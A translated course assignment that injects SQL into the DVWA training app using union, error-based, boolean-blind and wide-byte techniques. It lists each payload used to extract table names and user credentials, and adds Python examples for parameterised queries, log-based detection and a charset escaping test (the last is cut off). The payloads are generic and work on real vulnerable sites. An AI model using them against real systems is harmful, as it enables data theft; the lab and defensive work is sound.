
Week 7 Assignment

Part 1. Use union-based injection, on both the front end and the back end, to carry out the "database name - table name - column name - data" injection process, and write out the injection steps clearly

1. Enumerating the database name

Back-end SQL: select database();
Front end:
1' order by 1#
1' order by 2#
1' order by 3#
These establish that the query returns two columns, so there are two display positions.
1' union select database(),1#
Database name obtained: dvwa

2. Enumerating the tables of the dvwa database

Back-end SQL: select table_name from information_schema.tables where table_schema = database();
Front end:
1' union select table_name,1 from information_schema.tables where table_schema = database()#
Tables found in the dvwa database: guestbook, users

3. Enumerating the column names of the users table in the dvwa database

Back-end SQL: select column_name from information_schema.columns where table_schema = database() and table_name = 'users';
Front end:
1' union select column_name,1 from information_schema.columns where table_schema = database() and table_name = 'users'#
Column names of the users table in the dvwa database: user_id, first_name, last_name, user, password, avatar, last_login, failed_login

4. Extracting the data

Back-end SQL: select user,password from users;
Front end:
1' union select user,password from users#
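As an added example (not part of the original assignment), the following Python script reproduces the back-end pattern that makes the union injection above possible and sets it next to the fix. It uses an in-memory SQLite table with made-up rows standing in for DVWA's users table; because SQLite has no `#` comment, the constructed payload ends in `-- ` instead of the page's `#`, which plays the same role of neutralising the trailing quote.

```python
import sqlite3

# Constructed stand-in for DVWA's users table: column names follow the assignment,
# the rows and password values are placeholders, not DVWA data.
SAMPLE_USERS = [
    (1, "admin", "Admin", "User", "PASSWORD_HASH_PLACEHOLDER_1"),
    (2, "alice", "Alice", "Smith", "PASSWORD_HASH_PLACEHOLDER_2"),
]

# The page's payload, with SQLite's "-- " end-of-line comment in place of MySQL's "#".
UNION_PAYLOAD = "1' union select user,password from users -- "


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "create table users (user_id integer, user text, first_name text, "
        "last_name text, password text)"
    )
    conn.executemany("insert into users values (?, ?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    # Mirrors DVWA's low-security handler: the request parameter is pasted into
    # the SQL text, so a quote in the input ends the literal and the remainder is
    # parsed as SQL. This is the defect; it is kept only to contrast with the fix.
    query = f"select first_name, last_name from users where user_id = '{user_id}'"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, user_id) -> list:
    # The same query with a bound parameter: the driver sends the input as a value,
    # so it can never change the structure of the statement.
    return conn.execute(
        "select first_name, last_name from users where user_id = ?", (user_id,)
    ).fetchall()


def lookup_hardened(conn: sqlite3.Connection, user_id: str) -> list:
    # Defence in depth: user_id is a numeric identifier, so reject anything that
    # is not a plain integer before the query is even built.
    if not user_id.isdigit():
        raise ValueError("user_id must be a positive integer")
    return lookup_parameterized(conn, int(user_id))


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, payload :", lookup_vulnerable(db, UNION_PAYLOAD))
    print("parameterized       :", lookup_parameterized(db, UNION_PAYLOAD))
    try:
        lookup_hardened(db, UNION_PAYLOAD)
    except ValueError as exc:
        print("hardened            :", exc)
```

Run with python3: the vulnerable lookup returns the admin row followed by every user/password pair, while the parameterized lookup returns nothing for the same input and the hardened one refuses it before any SQL is built.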

Part 2. Use error-based injection, on both the front end and the back end, to carry out the "database name - table name - column name - data" injection process, and write out the injection steps clearly.

1. Enumerating the database name

Back-end SQL: select extractvalue(1,concat(0x7e,database()));
Front end:
1' and extractvalue(1,concat(0x7e,database()))#

2. Enumerating the tables of the dvwa database

1) Number of tables in the dvwa database
Back-end SQL:
select count(table_name) from information_schema.tables where table_schema = database();
select extractvalue(1,concat(0x7e,(select count(table_name) from information_schema.tables where table_schema = database())));
Front end:
1' and extractvalue(1,concat(0x7e,(select count(table_name) from information_schema.tables where table_schema = database())))#

2) Table names in the dvwa database: guestbook, users
Back-end SQL:
select table_name from information_schema.tables where table_schema = database() limit 0,1;
select extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = database() limit 0,1)));
select extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = database() limit 1,1)));
Front end:
1' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = database() limit 0,1)))#
1' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = database() limit 1,1)))#

3. Enumerating the column names of the users table in the dvwa database

1) Number of columns: 8
Back-end SQL:
select count(column_name) from information_schema.columns where table_schema = database() and table_name = 'users';
select extractvalue(1,concat(0x7e,(select count(column_name) from information_schema.columns where table_schema = database() and table_name = 'users')));
Front end:
1' and extractvalue(1,concat(0x7e,(select count(column_name) from information_schema.columns where table_schema = database() and table_name = 'users')))#

2) Column names: user and password
Back-end SQL:
select extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema = database() and table_name = 'users' limit 0,1)));
Front end:
1' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema = database() and table_name = 'users' limit 0,1)))#

4. Data: the values of user and password in the users table of the dvwa database

Back-end SQL:
select extractvalue(1,concat(0x7e,(select user from users where user_id = 1)));
select extractvalue(1,concat(0x7e,(select password from users where user_id = 1)));
Front end:
1' and extractvalue(1,concat(0x7e,(select user from users where user_id = 1)))#
1' and extractvalue(1,concat(0x7e,(select password from users where user_id = 1)))#

5. Answer the following questions about error-based injection:

(1) In the extractvalue function, why does '~' not raise an error when placed in argument 1, but raise an error when placed in argument 2?

Because the first argument of extractvalue(XML_document, xpath_string) is a string naming the XML document object, and such a string may contain '~'. The second argument is also a string, but it must follow XPath syntax, since it represents a path into the XML document, and a path expression can never contain '~'. So '~' in argument 1 does not raise an error, while '~' in argument 2 does.

(2) In error-based injection, why must the single-quote restriction be broken out of, and how is it done?

Breaking out of the single quote lets the 'and' escape the string literal, so that 'and' takes effect as SQL syntax in the statement.

Following SQL syntax, a single quote is placed before the and so that it closes the opening quote in the back-end SQL statement, and a # is appended at the end as a comment marker that truncates what follows, so the trailing single quote in the back-end statement no longer takes effect; this is how the and escapes the string.

(3) Why does the error-based injection process need to produce an error, and what kind of error is it?

When the second argument of extractvalue does not conform to document-path syntax, for example when it contains characters such as '~', '?' or '<' that are not allowed in a path, the function raises an error; this is a function-argument syntax error.

Part 3. Choose either boolean-based or time-based blind injection and carry out the "database name - table name" injection process on the front end and back end, writing out the injection steps clearly

1. Guessing the length of the database name (using binary search)

SQL: select length(database())
Front-end probes (the page's response is either "exists" or "missing"):
1' and length(database()) > 10 #    missing
1' and length(database()) > 5 #    missing
1' and length(database()) > 3 #    exists
1' and length(database()) = 4 #    exists
1' and length(database()) = 5 #    missing
The database name is 4 characters long.

2. Guessing the database name

SQL: select ascii(substr(database(),1,1))
1' and ascii(substr(database(),1,1)) > 126 #    missing
1' and ascii(substr(database(),1,1)) > 64 #    exists
1' and ascii(substr(database(),1,1)) > 96 #    exists
1' and ascii(substr(database(),1,1)) > 111 #    missing
1' and ascii(substr(database(),1,1)) > 103 #    missing
1' and ascii(substr(database(),1,1)) > 97 #    exists
1' and ascii(substr(database(),1,1)) > 100 #    missing
1' and ascii(substr(database(),1,1)) = 98 #    missing
1' and ascii(substr(database(),1,1)) = 99 #    missing
1' and ascii(substr(database(),1,1)) = 100 #    exists
The first character of the database name has ASCII code 100, which is 'd'.

1' and ascii(substr(database(),2,1)) > 126 #    missing
1' and ascii(substr(database(),2,1)) > 64 #    exists
1' and ascii(substr(database(),2,1)) > 98 #    exists
1' and ascii(substr(database(),2,1)) > 110 #    exists
1' and ascii(substr(database(),2,1)) > 118 #    missing
1' and ascii(substr(database(),2,1)) > 114 #    exists
1' and ascii(substr(database(),2,1)) > 116 #    exists
1' and ascii(substr(database(),2,1)) = 117 #    missing
1' and ascii(substr(database(),2,1)) = 118 #    exists
The second character has ASCII code 118, which is 'v'.

1' and ascii(substr(database(),3,1)) > 126 #    missing
1' and ascii(substr(database(),3,1)) > 64 #    exists
1' and ascii(substr(database(),3,1)) > 96 #    exists
1' and ascii(substr(database(),3,1)) > 110 #    exists
1' and ascii(substr(database(),3,1)) > 118 #    exists
1' and ascii(substr(database(),3,1)) > 122 #    missing
1' and ascii(substr(database(),3,1)) > 120 #    missing
1' and ascii(substr(database(),3,1)) = 119 #    exists
The third character has ASCII code 119, which is 'w'.

1' and ascii(substr(database(),4,1)) > 64 #    exists
1' and ascii(substr(database(),4,1)) > 96 #    exists
1' and ascii(substr(database(),4,1)) > 111 #    missing
1' and ascii(substr(database(),4,1)) > 103 #    missing
1' and ascii(substr(database(),4,1)) > 100 #    missing
1' and ascii(substr(database(),4,1)) > 98 #    missing
1' and ascii(substr(database(),4,1)) = 97 #    exists
The fourth character has ASCII code 97, which is 'a'.

The database name is: dvwa

3. Guessing the number of tables in the dvwa database

SQL: select count(table_name) from information_schema.tables where table_schema = database()
1' and (select count(table_name) from information_schema.tables where table_schema = database()) > 10#    missing
1' and (select count(table_name) from information_schema.tables where table_schema = database()) > 5#    missing
1' and (select count(table_name) from information_schema.tables where table_schema = database()) > 3#    missing
1' and (select count(table_name) from information_schema.tables where table_schema = database()) > 1#    exists
1' and (select count(table_name) from information_schema.tables where table_schema = database()) = 2#    exists
Number of tables in the dvwa database: 2

4. Guessing the table names in the dvwa database

First table:

1) Guessing the length of the first table name
SQL: select length(table_name) from information_schema.tables where table_schema = database() limit 0,1
1' and (select length(table_name) from information_schema.tables where table_schema = database() limit 0,1) > 10#    missing
1' and (select length(table_name) from information_schema.tables where table_schema = database() limit 0,1) > 5#    exists
1' and (select length(table_name) from information_schema.tables where table_schema = database() limit 0,1) > 8#    exists
1' and (select length(table_name) from information_schema.tables where table_schema = database() limit 0,1) = 9#    exists
Length of the first table name: 9

2) Guessing the name of the first table
SQL: select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1
1' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 64#    exists
1' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 98#    exists
1' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 112#    missing
1' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 105#    missing
1' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 102#    exists
1' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 104#    missing
1' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) = 103#    exists
The first character of the first table name has ASCII code 103, which is 'g'.

1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 64#    exists
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 98#    exists
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 112#    exists
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 120#    missing
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 116#    exists
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 118#    missing
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) = 117#    exists
The second character has ASCII code 117, which is 'u'.

1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 64#    exists
1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 98#    exists
1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 112#    missing
1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 105#    missing
1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 102#    missing
1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 100#    exists
1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) = 101#    exists
The third character has ASCII code 101, which is 'e'.

1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 64#    exists
1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 98#    exists
1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 112#    exists
1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 119#    missing
1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 116#    missing
1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 114#    exists
1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) = 115#    exists
The fourth character has ASCII code 115, which is 's'.

1' and (select ascii(substr(table_name,5,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 64#    exists
1' and (select ascii(substr(table_name,5,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 98#    exists
1' and (select ascii(substr(table_name,5,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 112#    exists
1' and (select ascii(substr(table_name,5,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 120#    missing
1' and (select ascii(substr(table_name,5,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 116#    missing
1' and (select ascii(substr(table_name,5,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 114#    exists
1' and (select ascii(substr(table_name,5,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) = 115#    missing
1' and (select ascii(substr(table_name,5,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) = 116#    exists
The fifth character has ASCII code 116, which is 't'.

1' and (select ascii(substr(table_name,6,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 64#    exists
1' and (select ascii(substr(table_name,6,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 98#    missing
1' and (select ascii(substr(table_name,6,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 81#    exists
1' and (select ascii(substr(table_name,6,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 89#    exists
1' and (select ascii(substr(table_name,6,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 94#    exists
1' and (select ascii(substr(table_name,6,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 96#    exists
1' and (select ascii(substr(table_name,6,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) = 97#    missing
1' and (select ascii(substr(table_name,6,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) = 98#    exists
The sixth character has ASCII code 98, which is 'b'.

1' and (select ascii(substr(table_name,7,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 64#    exists
1' and (select ascii(substr(table_name,7,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 98#    exists
1' and (select ascii(substr(table_name,7,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 112#    missing
1' and (select ascii(substr(table_name,7,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 105#    exists
1' and (select ascii(substr(table_name,7,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 109#    exists
1' and (select ascii(substr(table_name,7,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) = 110#    missing
1' and (select ascii(substr(table_name,7,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) = 111#    exists
The seventh character has ASCII code 111, which is 'o'.

1' and (select ascii(substr(table_name,8,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 64#    exists
1' and (select ascii(substr(table_name,8,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 98#    exists
1' and (select ascii(substr(table_name,8,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 112#    missing
1' and (select ascii(substr(table_name,8,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 105#    exists
1' and (select ascii(substr(table_name,8,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 109#    exists
1' and (select ascii(substr(table_name,8,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) = 110#    missing
1' and (select ascii(substr(table_name,8,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) = 111#    exists
The eighth character has ASCII code 111, which is 'o'.

1' and (select ascii(substr(table_name,9,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 64#    exists
1' and (select ascii(substr(table_name,9,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 98#    exists
1' and (select ascii(substr(table_name,9,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 112#    missing
1' and (select ascii(substr(table_name,9,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 105#    exists
1' and (select ascii(substr(table_name,9,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 109#    missing
1' and (select ascii(substr(table_name,9,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 107#    missing
1' and (select ascii(substr(table_name,9,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) = 106#    missing
1' and (select ascii(substr(table_name,9,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) = 107#    exists
The ninth character has ASCII code 107, which is 'k'.

The name of the first table in the dvwa database is: guestbook

Second table:

1) Guessing the length of the second table name in the dvwa database
SQL: select length(table_name) from information_schema.tables where table_schema = database() limit 1,1
1' and (select length(table_name) from information_schema.tables where table_schema = database() limit 1,1) > 10#    missing
1' and (select length(table_name) from information_schema.tables where table_schema = database() limit 1,1) > 5#    missing
1' and (select length(table_name) from information_schema.tables where table_schema = database() limit 1,1) > 3#    exists
1' and (select length(table_name) from information_schema.tables where table_schema = database() limit 1,1) = 4#    missing
1' and (select length(table_name) from information_schema.tables where table_schema = database() limit 1,1) = 5#    exists
Length of the second table name in the dvwa database: 5

2) Guessing the name of the second table in the dvwa database
SQL: select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = database() limit 1,1
1' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = database() limit 1,1) > 64#    exists
1' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = database() limit 1,1) > 98#    exists
1' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = database() limit 1,1) > 112#    exists
1' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = database() limit 1,1) > 119#    missing
1' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = database() limit 1,1) > 116#    exists
1' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = database() limit 1,1) = 117#    exists
The first character of the second table name has ASCII code 117, which is 'u'.

1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = database() limit 1,1) > 64#    exists
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = database() limit 1,1) > 98#    exists
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = database() limit 1,1) > 112#    exists
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = database() limit 1,1) > 119#    missing
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = database() limit 1,1) > 116#    missing
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = database() limit 1,1) > 114#    exists
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = database() limit 1,1) = 115#    exists
The second character has ASCII code 115, which is 's'.

1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = database() limit 1,1) > 64#    exists
1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = database() limit 1,1) > 98#    exists
1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = database() limit 1,1) > 112#    missing
1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = database() limit 1,1) > 105#    missing
1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = database() limit 1,1) > 102#    missing
1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = database() limit 1,1) > 100#    exists
1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = database() limit 1,1) = 101#    exists
The third character has ASCII code 101, which is 'e'.

1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = database() limit 1,1) > 64#    exists
1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = database() limit 1,1) > 98#    exists
1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = database() limit 1,1) > 112#    exists
1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = database() limit 1,1) > 119#    missing
1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = database() limit 1,1) > 116#    missing
1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = database() limit 1,1) > 114#    missing
1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = database() limit 1,1) = 113#    missing
1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = database() limit 1,1) = 114#    exists
The fourth character has ASCII code 114, which is 'r'.

1' and (select ascii(substr(table_name,5,1)) from information_schema.tables where table_schema = database() limit 1,1) > 64#    exists
1' and (select ascii(substr(table_name,5,1)) from information_schema.tables where table_schema = database() limit 1,1) > 98#    exists
1' and (select ascii(substr(table_name,5,1)) from information_schema.tables where table_schema = database() limit 1,1) > 112#    exists
1' and (select ascii(substr(table_name,5,1)) from information_schema.tables where table_schema = database() limit 1,1) > 119#    missing
1' and (select ascii(substr(table_name,5,1)) from information_schema.tables where table_schema = database() limit 1,1) > 116#    missing
1' and (select ascii(substr(table_name,5,1)) from information_schema.tables where table_schema = database() limit 1,1) > 114#    exists
1' and (select ascii(substr(table_name,5,1)) from information_schema.tables where table_schema = database() limit 1,1) = 115#    exists
The fifth character has ASCII code 115, which is 's'.

The name of the second table in the dvwa database is: users

5. Guessing the number of columns in the users table of the dvwa database

SQL: select count(column_name) from information_schema.columns where table_schema = database() and table_name = 'users'
1' and (select count(column_name) from information_schema.columns where table_schema = database() and table_name = 'users') > 10#    missing
1' and (select count(column_name) from information_schema.columns where table_schema = database() and table_name = 'users') > 5#    exists
1' and (select count(column_name) from information_schema.columns where table_schema = database() and table_name = 'users') > 8#    missing
1' and (select count(column_name) from information_schema.columns where table_schema = database() and table_name = 'users') > 7#    exists
1' and (select count(column_name) from information_schema.columns where table_schema = database() and table_name = 'users') = 8#    exists
Number of columns in the users table of the dvwa database: 8

6. Guessing the column names of the users table in the dvwa database

Retrieve a few columns that hold key information, such as the user name, the password, ...

[Guess] column names the database might use

User name: username/user_name/uname/u_name/user/name/...

Password: password/pass_word/pwd/pass/...

SQL: select count(*) from information_schema.columns where table_schema = database() and table_name = 'users' and column_name = 'username'
1' and (select count(*) from information_schema.columns where table_schema = database() and table_name = 'users' and column_name = 'username') = 1#    missing
1' and (select count(*) from information_schema.columns where table_schema = database() and table_name = 'users' and column_name = 'user') = 1#    exists
One column name of the users table guessed: user
1' and (select count(*) from information_schema.columns where table_schema = database() and table_name = 'users' and column_name = 'password') = 1#    exists
One column name of the users table guessed: password

The two column names found in the users table of the dvwa database: user, password

7. Guessing the values of the user and password columns in the users table

Values of the user column

1) Number of values in the user column: 5
SQL: select count(user) from users
1' and (select count(user) from users) > 10#    missing
1' and (select count(user) from users) > 5#    missing
1' and (select count(user) from users) > 3#    exists
........

2) Guessing the length of the first value in the user column: 5
SQL: select length(user) from users limit 0,1
1' and (select length(user) from users limit 0,1) > 10#    missing
.......

3) Guessing the first value in the user column: admin
SQL: select ascii(substr(user,1,1)) from users limit 0,1;
1' and (select ascii(substr(user,1,1)) from users limit 0,1) > 64 #    exists
1' and (select ascii(substr(user,1,1)) from users limit 0,1) > 98 #    missing
1' and (select ascii(substr(user,1,1)) from users limit 0,1) > 88 #    exists
1' and (select ascii(substr(user,1,1)) from users limit 0,1) > 94 #    exists
1' and (select ascii(substr(user,1,1)) from users limit 0,1) > 96 #    exists
1' and (select ascii(substr(user,1,1)) from users limit 0,1) = 97 #    exists
First character of the first user value: a
........
Second character of the first user value: d
Third character: m
Fourth character: i
Fifth character: n

4) Guessing the second/third/fourth/fifth values of the user column
......

Values of the password column

Same procedure as guessing the values of the user column
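From the defender's side, the probes in Part 2 and Part 3 leave a very recognisable trail: one client sending a run of requests whose id parameter contains ascii(substr(...)) with a bound that keeps halving, or extractvalue(...) calls, or a union select against information_schema. The Python script below is an added example (not part of the original assignment) that parses constructed Apache-style access-log lines, URL-decodes each query string, tags the request with the injection technique it resembles, and flags clients whose count of blind-injection probes reaches a threshold. The log lines, IP addresses, byte counts and threshold are all made up for the demonstration.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed Apache-style access-log lines (not real traffic). 10.0.0.9 sends URL-encoded
# forms of the probes from Parts 2 and 3; the other two clients are ordinary requests.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /vulnerabilities/sqli_blind/?id=1&Submit=Submit HTTP/1.1" 200 1512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /vulnerabilities/sqli_blind/?id=1%27+and+length%28database%28%29%29+%3E+10+%23&Submit=Submit HTTP/1.1" 200 1490
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /vulnerabilities/sqli_blind/?id=1%27+and+ascii%28substr%28database%28%29%2C1%2C1%29%29+%3E+64+%23&Submit=Submit HTTP/1.1" 200 1512
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /vulnerabilities/sqli_blind/?id=1%27+and+ascii%28substr%28database%28%29%2C1%2C1%29%29+%3D+100+%23&Submit=Submit HTTP/1.1" 200 1512
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /vulnerabilities/sqli/?id=1%27+and+extractvalue%281%2Cconcat%280x7e%2Cdatabase%28%29%29%29%23&Submit=Submit HTTP/1.1" 200 1302
10.0.0.7 - - [01/Jan/2024:10:00:06 +0000] "GET /vulnerabilities/sqli_blind/?id=2&Submit=Submit HTTP/1.1" 200 1512
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /vulnerabilities/sqli/?id=1%27+union+select+table_name%2C1+from+information_schema.tables+where+table_schema+%3D+database%28%29%23&Submit=Submit HTTP/1.1" 200 1610
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Technique tags and the decoded-text patterns that suggest them (case-insensitive).
SIGNATURES = {
    "union_select": re.compile(r"union\s+(?:all\s+)?select", re.I),
    "error_based": re.compile(r"\b(?:extractvalue|updatexml)\s*\(", re.I),
    "schema_enum": re.compile(r"information_schema\.", re.I),
    "blind_length_probe": re.compile(r"\blength\s*\(", re.I),
    "blind_char_probe": re.compile(r"\bascii\s*\(\s*substr", re.I),
    "time_based": re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
}


def decoded_query(target: str) -> str:
    """Return the URL-decoded query string of a request target ('' if it has none)."""
    if "?" not in target:
        return ""
    return unquote_plus(target.split("?", 1)[1])


def classify(query: str) -> list:
    """Tags for every signature that matches one decoded query string."""
    return [tag for tag, pattern in SIGNATURES.items() if pattern.search(query)]


def summarize(log_text: str) -> dict:
    """Per-client tag counts over the whole log; clients with no hits are omitted."""
    hits = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip rather than guess
        tags = classify(decoded_query(m.group("target")))
        if tags:
            hits.setdefault(m.group("ip"), Counter()).update(tags)
    return hits


def flag_blind_probing(summary: dict, threshold: int = 3) -> list:
    """Clients whose boolean/length probes reach the threshold. One true/false probe
    is noise; a run of them is the binary search walked through in Part 3."""
    return sorted(
        ip for ip, c in summary.items()
        if c["blind_char_probe"] + c["blind_length_probe"] >= threshold
    )


if __name__ == "__main__":
    s = summarize(SAMPLE_LOG)
    for ip, counts in s.items():
        print(ip, dict(counts))
    print("blind probing suspects:", flag_blind_probing(s))
```

The per-client counter matters more than any single signature: a real binary search over a 9-character table name produces dozens of near-identical requests from one source within seconds, which is the pattern worth alerting on even when individual payloads are obfuscated past the regexes.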

Part 4. Use wide-byte injection to carry out the "database name - table name" injection process, writing out the injection steps clearly

1. Enumerating the database name

lili%df' union select database(),version()#

2. Enumerating the tables

SQL: select table_name from information_schema.tables where table_schema = database()
lili%df' union select 1,table_name from information_schema.tables where table_schema = database()#

3. Enumerating the columns of the users table

4. Dumping the data: username and password from the users table

SQL: select username,password from users
lili%df' union select username,password from users#
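The reason the lili%df' input in Part 4 gets past escaping is a charset mismatch: the application escapes byte by byte (PHP addslashes() style, turning 0xDF 0x27 into 0xDF 0x5C 0x27), but a connection set to GBK reads 0xDF 0x5C as one two-byte character, so the backslash is swallowed and the quote is live again. The Python script below, an added example that is not part of the original assignment, re-implements that escaping step and checks whether the quote is still escaped once the bytes are decoded under a given connection charset; it is the kind of unit test a defender can point at their own escaping routine. The addslashes re-implementation and the input bytes are constructed for the demonstration; the real fix is a charset-aware escape (or, better, prepared statements) rather than any tweak to byte-wise escaping.

```python
# The page's wide-byte input after URL decoding: "lili", the byte 0xDF, then a quote.
WIDE_BYTE_INPUT = b"lili\xdf'"


def addslashes(data: bytes) -> bytes:
    """Byte-wise escaping in the style of PHP's addslashes(): every ' " \\ and NUL
    gets a backslash in front of it, with no knowledge of multibyte characters."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\\x00":
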